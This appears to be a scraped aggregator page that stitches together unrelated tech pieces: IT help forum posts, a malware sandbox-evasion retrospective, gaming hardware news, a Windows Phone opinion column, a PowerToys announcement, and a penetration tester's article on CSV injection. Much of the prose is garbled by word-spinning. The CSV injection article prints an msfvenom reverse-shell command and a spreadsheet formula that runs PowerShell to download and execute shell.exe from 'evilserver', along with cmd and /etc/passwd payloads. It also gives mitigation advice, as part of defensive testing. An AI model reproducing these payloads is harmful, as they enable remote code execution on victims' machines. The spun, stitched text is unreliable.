Limit LDAP User Session / Guest Session to X amount of time per Day/24hours

Limit LDAP User Session/ Guest Session to X quantity of time per Day/24hours.

Okay been attempting to research study this for days now. And for some factor, I simply can'' t discover a service or I'' m simply googling incorrect. Truthfully.

Just a fundamental requirement, i believe, a user, whether part of ADVERTISEMENT, or a visitor user, regional user, or any sort of user to simply have a connection/session limitation PER DAY( or per 24hours). session limitation will begin after First Login of a day.

Just like in coffeehouse where a client can just utilize the web for perhaps an hour or more, then, account will be void any longer. For us, we are limiting our staff members to simply utilize wifi access to 1hour per day. They will be utilizing their ADVERTISEMENT accounts (LDAP) for login.

After 1hour, detached, then they won'' t have the ability to login once again after 24hours from very first login.

The Guest Management function need to be terrific in Fortigate. Its just for visitors. We desire the users to be from our ADVERTISEMENT. (LDAP) Can'' t utilize the Fortigate Schedule function since that'' s for a repaired schedule. The one time scheduling is not perfect considering that we have a great deal of workers.

WLC have the ” “Enable Session Timeout “”, however users can simply re-login after being detached.

Can I do that with my present network setup? Is it possible? Fortigate 500D Firewall v5.6.3 build1547 (GA)

WLC: AIR-CT2504-K9 Software:

Windows Microsoft Active Directory

sent by / u/yatotengineer [link] [remarks]

Read more:

Evolution of Malware Sandbox Evasion Tactics – A Retrospective Study

Executive Summary

Malware evasion techniques are widely used to circumvent detection as well as analysis and understanding. One of the dominant categories of evasion is anti-sandbox detection, simply because today’s sandboxes are becoming the fastest and easiest way to have an overview of the threat. Many companies use these kinds of systems to detonate malicious files and URLs found, to obtain more indicators of compromise to extend their defenses and block other related malicious activity. Nowadays we understand security as a global process, and sandbox systems are part of this ecosystem, and that is why we must take care with the methods used by malware and how we can defeat it.

Historically, sandboxes had allowed researchers to visualize the behavior of malware accurately within a short period of time. As the technology evolved over the past few years, malware authors started producing malicious code that delves much deeper into the system to detect the sandboxing environment.

As sandboxes became more sophisticated and evolved to defeat the evasion techniques, we observed multiple strains of malware that dramatically changed their tactics to remain a step ahead. In the following sections, we look back on some of the most prevalent sandbox evasion techniques used by malware authors over the past few years and validate the fact that malware families extended their code in parallel to introducing more stealthier techniques.

The following diagram shows one of the most prevalent sandbox evasion tricks we will discuss in this blog, although many others exist.

Delaying Execution

Initially, several strains of malware were observed using timing-based evasion techniques [latent execution], which primarily boiled down to delaying the execution of the malicious code for a period using known Windows APIs like NtDelayExecution, CreateWaitTableTImer, SetTimer and others. These techniques remained popular until sandboxes started identifying and mitigating them.


As sandboxes identified malware and attempted to defeat it by accelerating code execution, it resorted to using acceleration checks using multiple methods. One of those methods, used by multiple malware families including Win32/Kovter, was using Windows API GetTickCount followed by a code to check if the expected time had elapsed. However, we observed several variations of this method across malware families.

This anti-evasion technique could be easily bypassed by the sandbox vendors simply creating a snapshot with more than 20 minutes to have the machine running for more time.

API Flooding

Another approach that subsequently became more prevalent, observed with Win32/Cutwail malware, is calling the garbage API in the loop to introduce the delay, dubbed API flooding. Below is the code from the malware that shows this method.



Inline Code

We observed how this code resulted in a DOS condition since sandboxes could not handle it well enough. On the other hand, this sort of behavior is not too difficult to detect by more involved sandboxes. As they became more capable of handling the API based stalling code, yet another strategy to achieve a similar objective was to introduce inline assembly code that waited for more than 5 minutes before executing the hostile code. We found this technique in use as well.

Sandboxes are now much more capable and armed with code instrumentation and full system emulation capabilities to identify and report the stalling code. This turned out to be a simplistic approach which could sidestep most of the advanced sandboxes. In our observation, the following depicts the growth of the popular timing-based evasion techniques used by malware over the past few years.

Hardware Detection

Another category of evasion tactic widely adopted by malware was fingerprinting the hardware, specifically a check on the total physical memory size, available HD size / type and available CPU cores.

These methods became prominent in malware families like Win32/Phorpiex, Win32/Comrerop, Win32/Simda and multiple other prevalent ones. Based on our tracking of their variants, we noticed Windows API DeviceIoControl() was primarily used with specific Control Codes to retrieve the information on Storage type and Storage Size.

Ransomware and cryptocurrency mining malware were found to be checking for total available physical memory using a known GlobalMemoryStatusEx () trick. A similar check is shown below.

Storage Size check:

Illustrated below is an example API interception code implemented in the sandbox that can manipulate the returned storage size.

Subsequently, a Windows Management Instrumentation (WMI) based approach became more favored since these calls could not be easily intercepted by the existing sandboxes.

Here is our observed growth path in the tracked malware families with respect to the Storage type and size checks.

CPU Temperature Check

Malware authors are always adding new and interesting methods to bypass sandbox systems. Another check that is quite interesting involves checking the temperature of the processor in execution.

A code sample where we saw this in the wild is:

The check is executed through a WMI call in the system. This is interesting as the VM systems will never return a result after this call.

CPU Count

Popular malware families like Win32/Dyreza were seen using the CPU core count as an evasion strategy. Several malware families were initially found using a trivial API based route, as outlined earlier. However, most malware families later resorted to WMI and stealthier PEB access-based methods.

Any evasion code in the malware that does not rely on APIs is challenging to identify in the sandboxing environment and malware authors look to use it more often. Below is a similar check introduced in the earlier strains of malware.

There are number of ways to get the CPU core count, though the stealthier way was to access the PEB, which can be achieved by introducing inline assembly code or by using the intrinsic functions.

One of the relatively newer techniques to get the CPU core count has been outlined in a blog, here. However, in our observations of the malware using CPU core count to evade automated analysis systems, the following became adopted in the outlined sequence.

User Interaction

Another class of infamous techniques malware authors used extensively to circumvent the sandboxing environment was to exploit the fact that automated analysis systems are never manually interacted with by humans. Conventional sandboxes were never designed to emulate user behavior and malware was coded with the ability to determine the discrepancy between the automated and the real systems. Initially, multiple malware families were found to be monitoring for Windows events and halting the execution until they were generated.

Below is a snapshot from a Win32/Gataka variant using GetForeGroundWindow and checking if another call to the same API changes the Windows handle. The same technique was found in Locky ransomware variants.

Below is another snapshot from the Win32/Sazoora malware, checking for mouse movements, which became a technique widely used by several other families.

Malware campaigns were also found deploying a range of techniques to check historical interactions with the infected system. One such campaign, delivering the Dridex malware, extensively used the Auto Execution macro that triggered only when the document was closed. Below is a snapshot of the VB code from one such campaign.

The same malware campaign was also found introducing Registry key checks in the code for MRU (Most Recently Used) files to validate historical interactions with the infected machine. Variations in this approach were found doing the same check programmatically as well.

MRU check using Registry key: \HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\User MRU

Programmatic version of the above check:

Here is our depiction of how these approaches gained adoption among evasive malware.

Environment Detection

Another technique used by malware is to fingerprint the target environment, thus exploiting the misconfiguration of the sandbox. At the beginning, tricks such as Red Pill techniques were enough to detect the virtual environment, until sandboxes started to harden their architecture. Malware authors then used new techniques, such as checking the hostname against common sandbox names or the registry to verify the programs installed; a very small number of programs might indicate a fake machine. Other techniques, such as checking the filename to detect if a hash or a keyword (such as malware) is used, have also been implemented as has detecting running processes to spot potential monitoring tools and checking the network address to detect blacklisted ones, such as AV vendors.

Locky and Dridex were using tricks such as detecting the network.

Using Evasion Techniques in the Delivery Process

In the past few years we have observed how the use of sandbox detection and evasion techniques have been increasingly implemented in the delivery mechanism to make detection and analysis harder. Attackers are increasingly likely to add a layer of protection in their infection vectors to avoid burning their payloads. Thus, it is common to find evasion techniques in malicious Word and other weaponized documents.

McAfee Advanced Threat Defense

McAfee Advanced Threat Defense (ATD) is a sandboxing solution which replicates the sample under analysis in a controlled environment, performing malware detection through advanced Static and Dynamic behavioral analysis. As a sandboxing solution it defeats evasion techniques seen in many of the adversaries. McAfee’s sandboxing technology is armed with multiple advanced capabilities that complement each other to bypass the evasion techniques attempted to the check the presence of virtualized infrastructure, and mimics sandbox environments to behave as real physical machines. The evasion techniques described in this paper, where adversaries widely employ the code or behavior to evade from detection, are bypassed by McAfee Advanced Threat Defense sandbox which includes:

Usage of windows API’s to delay the execution of sample, hard disk size, CPU core numbers and other environment information .
Methods to identify the human interaction through mouse clicks , keyboard strokes , Interactive Message boxes.
Retrieval of hardware information like hard disk size , CPU numbers, hardware vendor check through registry artifacts.
System up time to identify the duration of system alive state.
Check for color bit and resolution of Windows .
Recent documents and files used.

In addition to this, McAfee Advanced Threat Defense is equipped with smart static analysis engines as well as machine-learning based algorithms that play a significant detection role when samples detect the virtualized environment and exit without exhibiting malware behavior. One of McAfee’s flagship capability, the Family Classification Engine, works on assembly level and provides significant traces once a sample is loaded in memory, even though the sandbox detonation is not completed, resulting in enhanced detection for our customers.


Traditional sandboxing environments were built by running virtual machines over one of the available virtualization solutions (VMware, VirtualBox, KVM, Xen) which leaves huge gaps for evasive malware to exploit.

Malware authors continue to improve their creations by adding new techniques to bypass security solutions and evasion techniques remain a powerful means of detecting a sandbox. As technologies improve, so also do malware techniques.

Sandboxing systems are now equipped with advanced instrumentation and emulation capabilities which can detect most of these techniques. However, we believe the next step in sandboxing technology is going to be the bare metal analysis environment which can certainly defeat any form of evasive behavior, although common weaknesses will still be easy to detect.

The post Evolution of Malware Sandbox Evasion Tactics – A Retrospective Study appeared first on McAfee Blogs.

Read more:

Modern Gaming PCs Deliver the Best Performance and Experiences for Gamers

It’s been an exciting past couple of weeks for all gamers as announcements out of gamescom and IFA brought some of the most powerful gaming laptops, desktops, and displays we’ve seen to-date. From sharp 4K UHD resolution, to slim and lightweight machines to the best graphics and more, it’s a great time to be a gamer. And with NVIDIA’s Creators Ready Drivers, these devices are not only for gamers but also being used by graphic artists, 3D animators, game designers, video editors and more.

Learn more about Microsoft’s device partners Acer, ASUS, Dell, HP, and Razer who upped their game with new, modern PC gaming hardware you can learn more about below.

gamescom 2019

At gamescom 2019, Dell and Alienware announced a complete PC gaming ecosystem aimed at die-hard gamers and new players.

Dell AlienwareDell AlienwareDee MonitorDee Monitor

Alienware Aurorabrought the new Legend Industrial design (introduced at CES earlier this year) to a desktop for the first time. It provides improved airflow, along with Intel’s latest 9th Generation Core Processors and NVIDIA GeForce graphic cards. A tool-less upgrade option offers product longevity and scalable performance.
For the new PC gamer or those who are looking for budget-friendly gaming options, the new Dell G5 Desktop extends the G Series brand into the realm of desktops. It’s designed to offer game-ready power, graphics and features in a compact, upgradeable form.
Marking yet another milestone, Alienware rolled out the world’s first 55-inch OLED gaming monitor with the Alienware 55 OLED Gaming Monitor (AW5520QF). It has a 120Hz variable refresh rate, a response time of 0.5ms (gray-to-gray) and low-input latency. Gamers can also experience colors as they were intended with color accuracy and depth at 98+% DCI-P3 color coverage.

In addition, HP showed off new displays, desktops, laptops and gaming systems along with powerful gaming software and services.

HP MonitorHP MonitorHP PavilionHP PavilionHP Pavilion LaptopHP Pavilion Laptop

Competitive esports players will love the HP Omen X 27, a Quad HD (2560 x 1440) resolution display that showcases high dynamic range and DCI P3 90% color gamut for a more immersive gaming experience. To keep up with the high frames-per-second that high-end PCs muster and esports athletes require, the display rocks an industry-leading 240Hz refresh rate with a 1ms response time. It’s also AMD FreeSync 2 HDR certified, so the monitor is clean of tearing even when playing games in HDR mode.
Those looking for budget gaming options can check out the Pavilion Gaming Desktop, which emphasizes expandability within a new space-saving design. It includes expansion slots for up to three storage drives and DIY upgradability for memory, graphics cards, networks cards and Wi-Fi cards. CPU options of up to 8-core 9th Generation Intel Core i7 desktop processors or up to 8-core AMD Ryzen 7 desktop processors, graphics of up to NVIDIA GeForce RTX 2070 and the latest RTX 2060 Super, and up to 32GB DDR4 memory yield the power needed for the latest games or creative projects.
The latest Pavilion Gaming 15 is the first AMD powered gaming laptop from HP that features up to AMD Ryzen 7 mobile processor within an angular black chassis. Dual fans, a wide rear corner vent and enlarged air inlets maximize airflow to optimize your overall performance, keeping the machine cool during extended usage. Outfitted with a Wi-Fi 5 option supporting gigabyte speeds, it’s built for dependable game sessions and content creation.
Finally, Omen Command Center, which is available for any Windows 10 PC via the Microsoft Store, introduces new features designed to make it a central gaming hub that works seamlessly with Omen PCs, displays, and accessories.

IFA 2019

Pre-IFA 2019, Acer, ASUS, and Razer were first out of the gate to bring devices to the show floor that can handle serious multitasking for gamers and content creators alike. Multimedia professionals can work on intensive projects, like video editing and 3D rendering, quickly and efficiently. Gamers benefit from the ability to broadcast high-quality streams, chat with the channel and play the latest titles – all at the same time.


Acer PredatorAcer Predator

Acer introduced the Predator Triton 300 gaming notebook, which expands the Triton line with an affordable solution for mainstream gamers who also appreciate thin and lightweight designs with up to a 9th Generation Intel Core i7 Processor paired with an NVIDIA GeForce GTX 1650 GPU and 16GB of DDR4 2666Hz memory (upgradable to 32GB). To accommodate massive amounts of game storage, it will support up to two 1TB PCIe NVMe SSDs in RAID 0 and up to a 2TB hard drive. Killer Wi-Fi 6 AX 1650, along with Killer Ethernet, keeps the action moving quickly and lag-free.
Now with a 300Hz 15.6-inch Full-HD display, the Predator Triton 500is a powerful gaming notebook slimmed down to just .70 inches thin and weighing 4.6 pounds. It has a durable, all-metal chassis and narrow bezels for an 81% body-to-screen ratio.


ASUS ROGASUS ROGDell AlienwareDell Alienware

The ASUS ROG Zephyrus and Strix laptops in a new Glacier Blue hue are intended to appeal to graphic artists, 3D animators, game designers, and video editors – to name just a few examples – who can speed up their work thanks to pre-installed NVIDIA Creator Ready Drivers that improve performance for creative apps and programs, such as the Adobe Creative suite, Cinema 4D and Unreal Engine.
Strix Gelevates core gaming essentials in an affordable yet potent package, while Zephyrus M and Zephyrus S are hybrid powerhouses that offer a mix for work and play. Each is available with up to a 9th Generation Intel Core i7-9750H processor, enabling these machines to slice through serious workloads with speed. The new six-core CPU can hit frequencies of up to 4GHz on a single core with Turbo Boost 2.0 technology, and Hyper-Threading enables up to 12 parallel threads to accelerate heavy duty work.


RazerRazerRazer WhiteRazer White

Razer turned heads with its new Razer Blade Stealth 13 with NVIDIA GeForce GTX 1650 graphics, which the company is calling the “world’s first gaming ultrabook.” Powered by a new Intel 10thGeneration processor, it packs gaming performance into a thin 15mm chassis, weighing only about two pounds. Users can also render 3D models on the go. To optimize battery life and to ensure the right balance between power and productivity, the Razer Blade Stealth 13 GTX Models feature NVIDIA Optimus technology.
You can choose from one that has Full-HD or one with a 4K UHD touch display. Both come with the latest Intel 10thGeneration Core i7-1065G7 processor and a 512GB PCIe SSD. The 10th Generation processor comes with Intel’s latest Iris Plus graphics, providing users with more rendering prowess in either creative suites or casual games.
Features carried over from the previous generation include a customizable single-zone Razer Chroma RGB keyboard, a Windows Hello IR camera for easy and secure access, and a large glass trackpad with Windows Precision Drivers.

We’re excited to see what CES 2020 has to bring, but for now, these are just some of the new gaming products bringing powerful gaming to all types of Windows 10 gamers right now. Check back on Xbox Wire or the Windows Experience blog to keep up with the latest PC gaming product releases and news.

See the rest of the story on Xbox WireRelated:Play Gears 5 with Xbox Game Pass, free with Collector’s Edition Rockstar Energy.Gaijin Charenji 1: Kiss or Kill Available Now on Xbox OneThis Week on Xbox: September 6, 2019

Read more:

Super strange Outlook 2016/365 issue

Hello all,

so i have an interesting/frustrating problem that I'' m hoping you may be able to help with. We have a user who as soon as she classifies an e-mail, that email will up and move from her inbox to a random folder. This user remains in hr so she classifies every e-mail as it is available in and she naturally has like 100-400 folders (for every single matching employee/department/partners however her setup is not unlike our other 4 HR workers. Listed below noted are some actions we'' ve tried. she is utilizing a windows 10 PRO 64bit laptop computer with workplace 2016 32bit through our workplace 365 membership (once again this setup is not distinct and we have 400ish workers with the exact same hardware/software setup).

&#x 200B;

reset regional e-mail profile evaluated with both cached/online profiles confirmed there are no mobile devices/shared computer systems that her profile might be linked to had user reset password Not all e-mails that are classified relocation, now this is the weirdest part (and most likely needs some more description), not all e-mails under the impacted classification color are moving it is totally randomized. We have 5 e-mails in the purple classification however just e-mail 1,4 and 5 will be moved. We have looked for resemblance'' s however absolutely nothing has been apparent enough to protrude to us (various e-mails, various topics, various senders, various native lands, various times/dates, various e-mail companies, etc) confirmed she'' s not utilizing any outlook plug-ins/add-ons validated there are no fast actions referencing the classification or folder relabelled the very first folder (included a 1 to the end) and e-mails transferred to another random folder problem just emerged after we updated her from workplace 2010 to workplace 2016 confirmed no guidelines (both in your area on her laptop computer or on the server by means of owa) ran a trace on among the moved e-mails to verify it carried out in reality get effectively provided to the users inbox (that makes sense considering that the e-mails are just moving after classification) had server admin verify there are no server guidelines that are activated by classifications (no other users have reported this problem either) re-installed MS workplace on laptop computer While dealing with MS assistance we likewise validated with them that they could not discover any factor for the classified e-mails to be moving from inbox to random folder A. changed her laptop computer (she went on MAT leave so she got a brand-new device when she returned Also remarkably prior to she went on MAT leave we were having this problem with her yellow classification nevertheless now after she'' s returned shes having the problem with purple (both serve really various functions) opened an assistance ticket with Microsoft Premier assistance and they moved her profile to another database (appeared to repair the problem for about 2 months and after that it returned)

Has anybody ever seen something like this prior to? If so what did you do to repair it? Our next/only rational choice appears to be deletion/re-create the user profile under another name? Any insight would be considerably valued.

&#x 200B;

Thank you beforehand

sent by / u/it _ guy_Rich [link] [remarks]

Read more:

Remember when budget Windows Phones ran better than cheap Android phones?

 src='' srcset=' 2x' class=' avatar avatar-200 picture' height=' 200' width=' 200'/> Opinion post byHadlee Simons</p>
<p> This previous week marked the anniversary of <a href= Nokia being obtained by Microsoft back in 2011, signalling the start of completion of Nokia in the smart device area (up until HMD reanimated the brand name ).

A lot has actually been stated about the Windows Phone brand name, the glaring absence of apps that then ambuscaded the platform, and Microsoft’s regular platform restarts that left users in the stumble.

People may likewise keep in mind Windows Phones as being one-trick ponies (a minimum of the Lumia gadgets), providing fantastic video camera quality however very little else. Couple of individuals keep in mind there was a time when budget plan Windows Phones provided smoother experiences than even the finest spending plan Android phones.

.Android discovering its feet.

It’s simple to think about spending plan Android gadgets today as reasonably smooth, feature-packed phones. The scenario was quite frustrating back in the heady days of Android Ice Cream Sandwich and Jelly Bean .

Sure, there were the similarity the sub-$ 200 Moto G series, providing a quite smooth experience and numerous updates. These handsets were the exception rather than the guideline. Most of the time, purchasing a $100 to $150 Android phone implied you were stuck to a stuttering gadget that was sorely doing not have in storage.

The mobile landscape was cluttered with examples of phones like this at the time, such as the Samsung Galaxy Pocket series, the Sony Xperia E1, HTC Desire U, and Alcatel’s low-end items.

Great spending plan Android phones weren’t precisely abundant back in 2012 and 2013.

Cheap Android phones of yesteryear typically experienced efficiency concerns, owing to makers jeopardizing on specifications, and brand names overdoing it on Android modification . The platform likewise struggled with bad optimization at the time, although it’s hard to blame Google when Android was so flexible to start with.

Google definitely didn’t twiddle its thumbs, and dished out Project Butter and TRIM in 2012. These efforts became part of a quote to provide a smoother UI and enhance efficiency gradually. Even with these efforts though, there was no leaving the truth that inexpensive Windows Phones typically felt smoother than likewise geared up Android gadgets.

.How did Microsoft do it?

A huge reason that the platform was much smoother was because of Microsoft putting down a set of minimum requirements for makers. Windows Phone 8, for instance, needed a dual-core processor, 512MB of RAM, and 4GB of storage.

This set of requirements guaranteed strong efficiency on even the most affordable phones. The only genuine telltale indication of a budget plan Windows Phone was that you ‘d tend to see a “resuming” screen for a couple of seconds when hopping in between apps. Stutter, lag, and other efficiency problems were usually missing on the platform.

Aside from the mandated requirements, Microsoft likewise is worthy of some credit for the smooth efficiency of Windows Phone thanks to its persistence that nobody was permitted to considerably customize the user interface. The so-called Metro UI corresponded throughout phones from HTC , Nokia , Samsung , and others. No TouchWiz, HTC Sense, or Timescape UI here.

.Redefining budget plan expectations.

 Nokia 6.2 logo design and app dock

You just require to have a look at phones like the Lumia 520 for evidence of the platform’s smooth nature. For approximately $100, you got a dual-core processor, 512MB of RAM, and 8GB of expandable storage, and a 5MP rear cam. It’s not surprising that it was supposedly at one time the most popular Windows item , duration (consisting of Tablets and pcs). Low-cost yet slick phones like these assisted make Windows Phone more popular than iPhones in the similarity Italy back in late 2013, according to Kantar .

.Editor’s Pick When ought to you anticipate to get the Android 10 update?Officially called Android 10, the next significant variation of Android released September 3, 2019. The upgrade started presenting to all Pixel phones, consisting of the initial Pixel and Pixel XL, Pixel 2, Pixel 2 XL, ….

Those days of Windows Phone optimism are long past us however, and you definitely can’t argue that Microsoft was anywhere near removing Android. You may be able to argue that Microsoft’s mobile platform pressed Google to construct a much better, smoother Android developed for low-end phones, flagships, and anything in between.

Microsoft used functions like the capability to set up apps on a microSD card, dual-SIM assistance, and a battery saver mode. And these functions are very important for budget plan phones in emerging markets. Google just used native multi-SIM assistance in Android 5.1 in March 2015 — — approximately a year after Microsoft included it in the 8.1 release. The business was likewise sluggish to use a native battery saver mode, with the similarity Sony filling the space till Google provided the function in 2014.

There are a couple of more examples of cool Windows Phone includes later on embraced by Google or OEMs, such as Data Sense for information tracking/saving, and Wi-Fi Sense to quickly share Wi-Fi passwords with others.

You need to attempt actually tough to purchase a bad budget plan phone running Android in 2019.

More just recently, Google likewise relocated to resolve efficiency troubles on low-cost hardware with Android Go . This is a light-weight variation of Android, however the business set up some requirements here — — Google states Android Go needs gadgets to have at least 512MB of RAM — — in order to guarantee a great experience, perhaps taking a page out of Microsoft’s book.

Between Google’s efforts and intense competitors from OEMs, spending plan Android phones appear to have actually conquered their efficiency troubles. With gadgets like Xiaomi’s Redmi phones , the Moto E series, Realme gadgets, and, in a rather poetic turn of occasions, HMD Global’s budget friendly Nokia-branded entourage of Android One and Android Go phones, you need to attempt actually tough to purchase a bad budget plan phone running Android in 2019.

That wasn’t constantly the case however, so extra an idea for those forgotten, oft-maligned Windows Phones that, for a time, had a substantial edge over its less expensive Android competitors.

.More posts about Microsoft. Samsung Galaxy Note 10 Plus Aura White back at angleDeal: Get the Samsung Galaxy Note 10 for simply $800 ($ 150 off).Williams Pelegrin.2 days earlier. Spreadsheet Data ScienceMicrosoft Certification: A guide for tech specialists.Adam Sinicki.7 days back. minecraft earth marketing imageMinecraft Earth: Everything you require to understand (Update: Android beta sign-ups).Nick Fernandez.2 weeks earlier. Gears PopGears Pop: Here’s whatever you require to understand (Update: out now!).Nick Fernandez.2 weeks earlier. Mixer web page photoMixer: Here’s whatever you require to understand.Joe Hindy.1 month back. A WhatsApp app icon closeup on a mobile phone for the very best chat apps for android list10 finest messenger apps and chat apps for Android! (Updated 2019).Joe Hindy.1 month earlier. How to text on Windows 10 utilizing an Android phoneHow to text from Windows 10 utilizing an Android phone.Kevin Parrish.2 months earlier. The Microsoft Your Phone app.Microsoft Your Phone app now lets you see all your Android notices on PC.Hadlee Simons.2 months earlier. Microsoft Surface GoHere are the very best Microsoft Surface laptop computers and tablets.John Callaham.2 months back.Rumor: Upcoming Microsoft Surface dual-screen tablet might support Android apps.C. Scott Brown.3 months back..

Read more:

Introducing open source Windows 10 PowerToys

Microsoft Windows PowerToysYesterday the Windows Team announced the first preview and code release of PowerToys for Windows 10. This first preview includes two utilities:

The Windows key shortcut guide. Just hold down WIN+KEY for help A pro window manager called FancyZones. Check out this article for all the details!

Many years ago there was PowerToys for Windows 95 and frankly, it’s overdue that we have them for Windows 10 – and bonus points for being open source!

These tools are also open source and hosted on GitHub! Maybe you have an open source project that’s a “PowerToy?” Let me know in the comments. A great example of a PowerToy is something that takes a Windows Features and turns it up to 11!

EarTrumpet is a favorite example of mine of a community “PowerToy.” It takes the volume control and the Windows auto subsystem and tailors it for the pro/advanced user. You should definitely try it out!

As for these new Windows 10 Power Toys, here’s what the Windows key shortcut guide looks like:

PowerToys - Shortcut Guide

And here’s Fancy Zones. It’s very sophisticated. Be sure to watch the YouTube to see how to use it.

Fancy Zones

To kick the tires on the first two utilities, download the installer here.

The main PowerToys service runs when Windows starts and a user logs in. When the service is running, a PowerToys icon appears in the system tray. Selecting the icon launches the PowerToys settings UI. The settings UI lets you enable and disable individual utilities and provides settings for each utility. There is also a link to the help doc for each utility. You can right click the tray icon to quit the Power Toys service.

We’d love to see YOU make a PowerToy and maybe it’ll get bundled with the PowerToys installer!

How to create new PowerToys

See the instructions on how to install the PowerToys Module project template.
Specifications for the PowerToys settings API.

We ask that before you start work on a feature that you would like to contribute, please read our Contributor’s Guide. We will be happy to work with you to figure out the best approach, provide guidance and mentorship throughout feature development, and help avoid any wasted or duplicate effort.

Additional utilities in the pipeline are: Maximize to new Virtual Desktop widget The MTND widget shows a pop-up button when a user hovers over the maximize / restore button on any window. Clicking it creates a new desktop, sends the app to that desktop and maximizes the app on the new desktop. Process terminate tool Batch file renamer Animated gif screen recorder

If you find bugs or have suggestions, please open an issue in the Power Toys GitHub repo.

Sponsor: Uno Platform is the Open Source platform for building single codebase, native mobile, desktop and web apps using only C# and XAML. Built on top of Xamarin and WebAssembly! Check out the Uno Platform tutorial!

© 2019 Scott Hanselman. All rights reserved.


Read more:

‘Microsoft the Musical’ is the geekiest tribute to the tech giant’s history

 Twitter  Facebook

Well, this is one musical we never ever believed we ‘d see.

Microsoft the Musical is a brief efficiency going through a short history of the innovation business established by Bill Gates .

Created by 150 full-time interns and workers throughout their extra time throughout 8 weeks, the tune and dance brief is suggested to forward Microsoft’s objective to “empower everyone and every company on earth to accomplish more.”

The musical is both a truthful and cringe-y introduction of the business’s failures and successes.

From Windows , to Office , to Surfac e, to Xbox, to HoloLens , to Azure , all of Microsoft’s significant services and products get some sort of shoutout. Read more …

More about Microsoft , Windows , Musical , Surface , and Vista

Read more:

Data Extraction to Command Execution CSV Injection

As web applications get more complex and more information driven, the capability to extract information from a web application is ending up being more typical. I work as a primary penetration tester on Veracode’’ s MPT group, and most of web applications that we check nowadays have the capability to extract information in a CSV format. The most typical software application set up in business environments is Microsoft Excel, and this software application has the capability to open CSV files (in many cases, this is the default). It ought to be kept in mind that this kind of attack would likewise impact LibreOffice as it would likewise translate the payload as formula.

.Assault Requirements.

In order to carry out a standard attack, a variety of requirements are required. An assailant requires the capability to inject a payload into the tables within the application. The application requires to enable a victim to download this information into CSV format that can then be opened in Excel. This would trigger the payload to be analyzed as an Excel formula and run.

.Fundamental Attack.

1. Browse the application to discover an area where any information input can be drawn out.


2. Inject Payload =HYPERLINK(““ “, “ Click for Report “”-RRB-



3. Validate the application is susceptible to this kind of attack. Extract the information and verify the payload has actually been injected by opening the CSV file in Microsoft Excel.


4. You can then see a ““ Click for Report link” ” in the Excel File. This shows the payload has actually been injected properly.


In this situation, when the victim clicks the link, it will take them to the Veracode site. This kind of attack may not appear too major, however think about the following:

Instead of rerouting an end user to the Veracode site, we might reroute completion user to a server we managed, which included a clone of the site. We might then ask the victim to validate to our clone site, enabling us as the enemy to take his/her qualifications. We might then utilize these qualifications on the initial site and have access to all his/her individual info or any performance the account has access to. There are likewise a variety of other attacks possible with this kind of formula injection, consisting of exfiltrating delicate information, acquiring remote code execution, and even checking out the contents of specific files under the ideal situations. We can take a look at among these kinds of attacks listed below.

.Advance Attack –– Remote Command Execution.

An advanced attack would utilize the exact same approach as above however with a various payload, which would result in remote code execution. This kind of attack does depend upon a variety of aspects and may not constantly be possible. It’’ s still worth thinking about and likewise highlights how severe this vulnerability can be under the ideal situations.

.Attack in Steps.

1. We’’ ll utilize a shell.exe file, which can include whatever we wish to perform on the system however, in this circumstance, we will utilize msfvenom to develop a reverse Meterpreter payload.

msfvenom -p windows/meterpreter/reverse _ tcp -a x64– platform Windows LHOST=<> LPORT= 1234 -f exe>> shell.exe


2. We likewise require to establish a listener that will await the link back to us as soon as the shell.exe payload has actually been carried out on the victim’’ s device. We will utilize Metasploit multi/handler for this example. We require to set the LPORT and likewise ensure the IP address is right.


3. We likewise require to host the shell.exe payload so it can be downloaded. For this, I utilized the following command, python -m SimpleHTTPServer 1337, which will establish a basic web server in the present directory site on my system. A genuine attack may host this on a jeopardized web server.

4. As soon as all this has actually been established, we might then inject the payload into the application and await a victim to download the CSV file and click the cell with the payload in it.

= cmd |’/ C powershell Invoke-WebRequest “ http://evilserver:1337/shell.exe

– OutFile “$ env: Temp shell.exe”; Start-Process “$ env: Temp shell.exe”‘! A1

.Breakdown of Payload.The very first line is calling cmd, which gets passed to the PowerShell Invoke-WebRequest to download a shell.exe file from our evilserver on port 1337. Keep in mind that if the host is running PowerShell variation 2, the Invoke-WebRequest won’’ t work. The next line is conserving the shell.exe file into the temperature directory site. The factor we utilize the temperature directory site is due to the fact that it’’ s a folder anybody can compose to.We then begin a procedure to perform the downloaded shell.exe payload.

5. When the victim opens the file, the CSV injection payload would run. It might provide a ““ Remote Data Not Accessible” ” caution. The opportunities are that the majority of victims would believe the file has actually originated from a genuine source therefore they require to choose yes to see the information. It ought to likewise be kept in mind that in this circumstance the Excel file is empty apart from our payload. In a real-world attack, the Excel file would be occupied with info from the application.

6. When the victim chooses yes, within a couple of minutes, Metasploit will get a reverse link from the victim’’ s host.


7. At this moment, the opponent can carry out a variety of jobs depending upon the level of gain access to she or he has actually acquired. This consists of, however is not restricted to, taking passwords in memory, assaulting other systems in the network (if this host is linked to a network), taking control of usages’ ’ cams, and so on. Under the best situations, it would be possible to jeopardize a whole domain utilizing this attack.

When screening for CSV injections, in the majority of circumstances, a tester will utilize a basic payload. This is because of a variety of factors. It’’ s not unusual for a tester to show this kind of attack by utilizing a Hyperlink payload like the one above, or a basic cmd payload like the following =cmd|’’/’C cmd.exe ’! ’ A.


Some may likewise utilize the following payload depending upon the os: =’ file:// etc/passwd’ #$ passwd.A1

This would check out the very first line within the etc/passwd file on a Linux system.

.Alleviating the Risk.

The finest method to reduce versus this kind of attack is to make certain all users’ ’ inputs are filtered so just anticipated characters are permitted. When processing, client-supplied inputs ought to constantly be thought about hazardous and treated with care. CSV injection is an adverse effects of bad input recognition, and other kinds of web attacks are because of weak input recognition. To alleviate versus CSV injections, a default-deny routine expression or ““ whitelist ” routine expression needs to be utilized to filter all information that is sent to the application. Since Excel and CSV files make use of equates to indications (=-RRB-, plus indications (+), minus indications (-), and ““ At ” signs (@) to signify solutions, we suggest filtering these out to make sure no cells start with these characters. Any component that might appear in a report might be a target for Excel/ CSV injections and ought to be more verified for CSV injection.

In summary, CSV injection is not a brand-new attack vector, however it’’ s one that designers typically ignore. As more web applications have the capability to extract information, it’’ s one that might have major effects if actions are not required to alleviate the danger it positions. In addition, designers ought to be inspecting user input for other kinds of attacks like XSS.


Read more:

This Week in Security News: New Zero-Day Vulnerability Findings and Mobile Phishing Scams

